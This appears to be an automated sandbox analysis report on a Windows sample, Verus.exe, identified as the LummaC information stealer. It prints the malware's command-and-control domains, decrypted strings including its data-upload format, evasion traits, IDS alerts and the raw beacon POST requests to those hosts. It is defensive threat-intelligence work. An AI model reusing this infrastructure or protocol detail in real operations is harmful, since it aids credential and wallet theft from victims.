Edit tour

Windows Analysis Report
Verus.exe

Overview

General Information

Sample name:	Verus.exe
Analysis ID:	1533001
MD5:	9639830d1a300d2e4c409c5809374039
SHA1:	69a8860b3e95de30f7abb485d11908c4deceff68
SHA256:	6d7a6e7c674e93b337ed751614e214ab6430a4c4ae5a9811c3ed3fdac5e0ae59
Tags:	exeuser-4k95m
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Verus.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\Verus.exe" MD5: 9639830D1A300D2E4C409C5809374039)

WerFault.exe (PID: 7896 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7416 -s 1812 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["enginenek.buzz", "ehticsprocw.sbs", "allocatinow.sbs", "vennurviot.sbs", "mathcucom.sbs", "resinedyw.sbs", "enlargkiw.sbs", "condifendteu.sbs", "drawwyobstacw.sbs"], "Build id": "yau6Na--1816906785"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x5829d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:19.941969+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49734	188.114.97.3	443	TCP
2024-10-14T09:41:20.905771+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49736	188.114.96.3	443	TCP
2024-10-14T09:41:21.927938+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49739	172.67.152.13	443	TCP
2024-10-14T09:41:22.865609+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49741	172.67.205.156	443	TCP
2024-10-14T09:41:23.863313+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49743	172.67.140.193	443	TCP
2024-10-14T09:41:24.794499+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49745	172.67.173.224	443	TCP
2024-10-14T09:41:25.755191+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49746	172.67.141.136	443	TCP
2024-10-14T09:41:26.721336+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49747	188.114.97.3	443	TCP
2024-10-14T09:41:28.784132+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49749	104.21.53.8	443	TCP
2024-10-14T09:41:29.769239+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49750	104.21.53.8	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:19.941969+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49734	188.114.97.3	443	TCP
2024-10-14T09:41:20.905771+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49736	188.114.96.3	443	TCP
2024-10-14T09:41:21.927938+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49739	172.67.152.13	443	TCP
2024-10-14T09:41:22.865609+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49741	172.67.205.156	443	TCP
2024-10-14T09:41:23.863313+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49743	172.67.140.193	443	TCP
2024-10-14T09:41:24.794499+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49745	172.67.173.224	443	TCP
2024-10-14T09:41:25.755191+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49746	172.67.141.136	443	TCP
2024-10-14T09:41:26.721336+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49747	188.114.97.3	443	TCP
2024-10-14T09:41:28.784132+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49749	104.21.53.8	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:29.769239+0200	2049812	1	A Network Trojan was detected	192.168.2.4	49750	104.21.53.8	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:25.328291+0200	2056559	1	Domain Observed Used for C2 Detected	192.168.2.4	49746	172.67.141.136	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:26.247417+0200	2056557	1	Domain Observed Used for C2 Detected	192.168.2.4	49747	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:24.361546+0200	2056561	1	Domain Observed Used for C2 Detected	192.168.2.4	49745	172.67.173.224	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:21.465726+0200	2056567	1	Domain Observed Used for C2 Detected	192.168.2.4	49739	172.67.152.13	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:20.457525+0200	2056571	1	Domain Observed Used for C2 Detected	192.168.2.4	49736	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:22.430952+0200	2056565	1	Domain Observed Used for C2 Detected	192.168.2.4	49741	172.67.205.156	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:23.419075+0200	2056563	1	Domain Observed Used for C2 Detected	192.168.2.4	49743	172.67.140.193	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:20.913836+0200	2056568	1	Domain Observed Used for C2 Detected	192.168.2.4	57419	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:24.826858+0200	2056558	1	Domain Observed Used for C2 Detected	192.168.2.4	63303	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:25.756813+0200	2056556	1	Domain Observed Used for C2 Detected	192.168.2.4	59559	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:23.865115+0200	2056560	1	Domain Observed Used for C2 Detected	192.168.2.4	55426	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:20.923976+0200	2056566	1	Domain Observed Used for C2 Detected	192.168.2.4	59480	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:19.948249+0200	2056570	1	Domain Observed Used for C2 Detected	192.168.2.4	63793	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:21.935684+0200	2056564	1	Domain Observed Used for C2 Detected	192.168.2.4	61189	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:22.882835+0200	2056562	1	Domain Observed Used for C2 Detected	192.168.2.4	54020	1.1.1.1	53	UDP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T09:41:28.061383+0200	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49748	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware

Found malware configuration

Source: Verus.exe.7416.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["enginenek.buzz", "ehticsprocw.sbs", "allocatinow.sbs", "vennurviot.sbs", "mathcucom.sbs", "resinedyw.sbs", "enlargkiw.sbs", "condifendteu.sbs", "drawwyobstacw.sbs"], "Build id": "yau6Na--1816906785"}

Multi AV Scanner detection for domain / URL

Source: condifendteu.sbs	Virustotal: Detection: 17%	Perma Link
Source: vennurviot.sbs	Virustotal: Detection: 17%	Perma Link
Source: drawwyobstacw.sbs	Virustotal: Detection: 17%	Perma Link
Source: ehticsprocw.sbs	Virustotal: Detection: 15%	Perma Link
Source: mathcucom.sbs	Virustotal: Detection: 20%	Perma Link
Source: resinedyw.sbs	Virustotal: Detection: 17%	Perma Link
Source: enlargkiw.sbs	Virustotal: Detection: 17%	Perma Link
Source: allocatinow.sbs	Virustotal: Detection: 19%	Perma Link
Source: sergei-esenin.com	Virustotal: Detection: 17%	Perma Link
Source: allocatinow.sbs	Virustotal: Detection: 19%	Perma Link
Source: enlargkiw.sbs	Virustotal: Detection: 17%	Perma Link
Source: drawwyobstacw.sbs	Virustotal: Detection: 17%	Perma Link
Source: mathcucom.sbs	Virustotal: Detection: 20%	Perma Link
Source: https://enginenek.buzz/api	Virustotal: Detection: 8%	Perma Link
Source: https://vennurviot.sbs/api	Virustotal: Detection: 17%	Perma Link
Source: ehticsprocw.sbs	Virustotal: Detection: 15%	Perma Link
Source: https://drawwyobstacw.sbs/api	Virustotal: Detection: 17%	Perma Link
Source: condifendteu.sbs	Virustotal: Detection: 17%	Perma Link
Source: https://mathcucom.sbs/	Virustotal: Detection: 20%	Perma Link
Source: https://allocatinow.sbs/api	Virustotal: Detection: 19%	Perma Link
Source: https://resinedyw.sbs/	Virustotal: Detection: 17%	Perma Link
Source: https://resinedyw.sbs/api	Virustotal: Detection: 17%	Perma Link
Source: https://ehticsprocw.sbs/.	Virustotal: Detection: 15%	Perma Link

Multi AV Scanner detection for submitted file

Source: Verus.exe

Virustotal: Detection: 8%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.3% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp	String decryptor: drawwyobstacw.sbs
Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp	String decryptor: condifendteu.sbs
Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp	String decryptor: ehticsprocw.sbs
Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp	String decryptor: vennurviot.sbs
Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp	String decryptor: resinedyw.sbs
Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp	String decryptor: enlargkiw.sbs
Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp	String decryptor: allocatinow.sbs
Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp	String decryptor: mathcucom.sbs
Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp	String decryptor: enginenek.buzz
Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp	String decryptor: yau6Na--1816906785

Source: Verus.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.152.13:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.205.156:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.141.136:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49750 version: TLS 1.2

Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_00420B80 SendMessageW,SendMessageW,SendMessageW,GetModuleFileNameW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcpyW,SendMessageW,lstrcmpW,SendMessageW,SendMessageW,FindNextFileW,FindClose,	0_2_00420B80
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_004BD1D0 FindFirstFileW,lstrcmpW,lstrcmpW,	0_2_004BD1D0
Source: C:\Users\user\Desktop\Verus.exe	Code function: 0_2_0045D260 lstrcpyW,lstrcpyW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcatW,lstrcpyW,lstrcatW,FindNextFileW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcatW,lstrcpyW,lstrcatW,FindNextFileW,FindClose,	0_2_0045D260

Source: C:\Users\user\Desktop\Verus.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-3643ABD5h]	0_2_00B7F0A0
Source: C:\Users\user\Desktop\Verus.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h	0_2_00B7D070
Source: C:\Users\user\Desktop\Verus.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], C85F7986h	0_2_00B7D070
Source: C:\Users\user\Desktop\Verus.exe	Code function: 4x nop then cmp byte ptr [ebx+eax], 00000000h	0_2_00B70050
Source: C:\Users\user\Desktop\Verus.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 03BA5404h	0_2_00B92160
Source: C:\Users\user\Desktop\Verus.exe	Code function: 4x nop then jmp ecx	0_2_00B702E3
Source: C:\Users\user\Desktop\Verus.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h	0_2_00B922C0
Source: C:\Users\user\Desktop\Verus.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	0_2_00B57260
Source: C:\Users\user\Desktop\Verus.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00B72350
Source: C:\Users\user\Desktop\Verus.exe	Code function: 4x nop then movzx edi, byte ptr [ecx]	0_2_00B614B3
Source: C:\Users\user\Desktop\Verus.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+14h]	0_2_00B5F430
Source: C:\Users\user\Desktop\Verus.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ebx+04h]	0_2_00B5F430
Source: C:\Users\user\Desktop\Verus.exe	Code function: 4x nop then jmp eax	0_2_00B62418
Source: C:\Users\user\Desktop\Verus.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-73239D8Bh]	0_2_00B7D460
Source: C:\Users\user\Desktop\Verus.exe	Code function: 4x nop then mov eax, ebx	0_2_00B61566

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056564 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) : 192.168.2.4:61189 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056557 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI) : 192.168.2.4:49747 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056571 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI) : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056567 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI) : 192.168.2.4:49739 -> 172.67.152.13:443
Source: Network traffic	Suricata IDS: 2056568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) : 192.168.2.4:57419 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056561 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI) : 192.168.2.4:49745 -> 172.67.173.224:443
Source: Network traffic	Suricata IDS: 2056565 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI) : 192.168.2.4:49741 -> 172.67.205.156:443
Source: Network traffic	Suricata IDS: 2056570 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) : 192.168.2.4:63793 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056560 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) : 192.168.2.4:55426 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056562 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) : 192.168.2.4:54020 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056566 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) : 192.168.2.4:59480 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056563 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI) : 192.168.2.4:49743 -> 172.67.140.193:443
Source: Network traffic	Suricata IDS: 2056559 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI) : 192.168.2.4:49746 -> 172.67.141.136:443
Source: Network traffic	Suricata IDS: 2056558 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) : 192.168.2.4:63303 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056556 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) : 192.168.2.4:59559 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49748 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49750 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49747 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49750 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49747 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49739 -> 172.67.152.13:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49745 -> 172.67.173.224:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 172.67.152.13:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49741 -> 172.67.205.156:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49746 -> 172.67.141.136:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 172.67.141.136:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 172.67.205.156:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 172.67.173.224:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49743 -> 172.67.140.193:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 172.67.140.193:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49749 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 104.21.53.8:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: enginenek.buzz
Source: Malware configuration extractor	URLs: ehticsprocw.sbs
Source: Malware configuration extractor	URLs: allocatinow.sbs
Source: Malware configuration extractor	URLs: vennurviot.sbs
Source: Malware configuration extractor	URLs: mathcucom.sbs
Source: Malware configuration extractor	URLs: resinedyw.sbs
Source: Malware configuration extractor	URLs: enlargkiw.sbs
Source: Malware configuration extractor	URLs: condifendteu.sbs
Source: Malware configuration extractor	URLs: drawwyobstacw.sbs

Source: Joe Sandbox View	IP Address: 104.21.53.8 104.21.53.8
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enginenek.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mathcucom.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enlargkiw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resinedyw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vennurviot.sbs
